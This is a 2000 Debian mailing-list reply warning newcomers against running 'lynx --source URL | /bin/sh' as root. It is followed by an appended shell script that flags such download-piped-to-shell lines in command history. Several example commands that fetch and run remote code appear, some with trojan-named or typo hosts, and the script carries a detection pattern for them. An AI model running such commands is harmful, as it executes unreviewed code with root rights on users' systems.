
Re: Horrifying suggestion



On Wed, Nov 01, 2000 at 01:33:45PM +0100, Peter Hugosson-Miller wrote:
> Ethan Benson wrote:
> 
> > teaching newbies how to run arbitrary code as root on their machine
> > without having the slightest idea what it is going to do is a bad
> > idea.  the fact that this is targeted at newbies makes it WORSE.
> 
> Well I'm certainly not advocating the above. All my suggestion did 
> was to provide a way _in_ to Debian, for someone who might be 
> interested in trying it out, but who isn't familiar with Linux. 
> There's almost nothing you've said in your mails that I don't agree 
> with - we're singing from the same hymn sheet, so to speak.

well you're advocating users run lynx --source | /bin/sh which is
running arbitrary code from a web site as root.  

now going to the site looking at the shell script, downloading to a
file running chmod +x and then running it is a bit less evil.  

[deletia]
> 
> 5) newbie@mycomputer$ panel &
> 
> Now we're getting somewhere... maybe this can be automated? Newbie
> goes back to the books, finds out which files to edit. 

since when has debian been this bad?  if you select the gnome stuff in
tasksel or dselect you get a working gnome desktop.

> 
> Using go-gnome? Elapsed time 25 minutes. OK, newbie is still dumb, but
> now has an opportunity to click around the system and find out stuff,
> maybe even discover that Debian is better than 'doze! Newbie even gets
> sawfish installed, so the GUI looks nicer still!

now newbie goes wandering around on the web and finds a page saying
c00l things will occur if they run lynx --source
http://crack.me.plenty/install-a-trojan.txt | /bin/sh and they figure
why not it worked for gnome!

they might do it anyway even if they never heard of that before but
hopefully the fact of such a command being totally unknown they might
hesitate long enough for that common sense thing to kick in.  

or let's say they accidentally type lynx --source http://gognome.org | sh
or go-gnome.net....

> Hear, hear! Never run arbitrary code from a web server as root!! Now
> if the helix-gnome packages could just be incorporated into Debian, we
> wouldn't even be having this discussion.

it was recently challenged on -devel to point out exactly what is so
unusable and broken about debian gnome, and you know what?  nobody
could answer that, other than a couple vague comments about a couple
bugs being fixed and a purely subjective opinion that the lighter
color tone selected by default in helix compared to debian was easier
on the eyes.  what is so special about helix?  

the truth is debian gnome is just fine and most certainly is good
enough for said newbie to get along until they learn enough to install
helix properly if they still want to.  (maybe using debian gnome text
editors to add apt lists) 

> To look at the script, just enter this url in your favourite web
> browser: http://go-gnome.com/

so tell newbies to go look at it, save it, make it executable and then
run it.  don't make things too easy.  

otherwise they will soon become complacent and i can tell them `sure i
can fix that problem, just run lynx --source
http://www.alaska.net/~erbenson/install-this-trojan | /bin/sh 

that happily adds that inetd line i sarcastically mentioned earlier.  

(no such file exists don't worry)

> And if the newbie can't get it installed at all, then he/she is also 
> kept from learning this new system. More money goes into B*ll G***s 
> pockets as newbie gives up and buys 'doze2K.

bzzzt, debian gnome is right there in the tasksel window and despite
popular belief it's just fine.  

> I couldn't agree more! Long Live Linux!

GNU/Linux ;-)

-- 
Ethan Benson
http://www.alaska.net/~erbenson/
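
An added example, not part of the original message: a small shell audit that flags history lines piping a download straight into a shell, and marks the ones whose host is not the intended one (the mistyped-domain case raised in the message). `EXPECTED_HOST`, the function names and the sample history are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit command lines for "download | shell" usage.
# EXPECTED_HOST and the sample history below are constructed, not real logs.
EXPECTED_HOST="go-gnome.com"

# Print the lower-cased host of the last http(s) URL on a command line.
url_host() {
    printf '%s\n' "$1" |
        sed -n 's#.*https\{0,1\}://\([^/ |:]*\).*#\1#p' | tr 'A-Z' 'a-z'
}

# Classify one command line:
#   none             - no download piped into a shell
#   piped            - download from EXPECTED_HOST piped into a shell
#   piped-other-host - download from any other host piped into a shell
classify() {
    if ! printf '%s\n' "$1" |
        grep -Eq '(lynx +-?-source|curl|wget)[^|]*\|[[:space:]]*(sudo +)?(/bin/)?(ba)?sh([[:space:]]|$)'
    then
        echo none
        return 0
    fi
    if [ "$(url_host "$1")" = "$EXPECTED_HOST" ]; then
        echo piped              # still unreviewed code, just the intended site
    else
        echo piped-other-host   # typo or look-alike domain, or an unknown site
    fi
}

# Read command lines on stdin; print "verdict<TAB>line" for each flagged one.
scan_history() {
    while IFS= read -r line; do
        verdict=$(classify "$line")
        [ "$verdict" = none ] || printf '%s\t%s\n' "$verdict" "$line"
    done
}

# Constructed history: the pipe-to-shell form, two mistyped hosts, and the
# save / read / chmod / run sequence, which is not flagged.
sample_history() {
    cat <<'EOF'
lynx --source http://go-gnome.com/ | sh
lynx --source http://gognome.org | sh
lynx --source http://go-gnome.com/ > go-gnome.sh
less go-gnome.sh
chmod +x go-gnome.sh && ./go-gnome.sh
lynx --source http://go-gnome.net | /bin/sh
EOF
}

sample_history | scan_history
```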
